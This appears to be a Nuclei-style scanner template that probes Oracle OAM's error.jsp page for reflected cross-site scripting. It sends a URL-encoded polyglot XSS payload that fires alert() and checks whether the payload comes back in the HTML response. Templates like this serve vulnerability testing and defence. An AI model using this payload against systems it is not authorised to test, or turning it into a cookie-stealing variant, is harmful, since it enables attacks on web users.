id: Oracle-OAM-XSS

info:
  name: Oracle OAM - XSS
  author: dk4trin
  severity: medium
  description: Cross-site scripting (XSS) on Oracle OAM
  tags: xss,oracle

requests:
  - method: GET
    path:
      - '{{BaseURL}}/oam/pages/error.jsp?error=javascript%3A%2F%2Axssx%27%22%3E--%3E%3C%2Fnoscript%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fstyle%3E%3C%2Ftemplate%3E%3C%2Fnoembed%3E%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%2F%2F%3E%2A%2F%3Btop.alert%282%29%2F%2F'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "alert(1)//>*/;top.alert(2)//"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
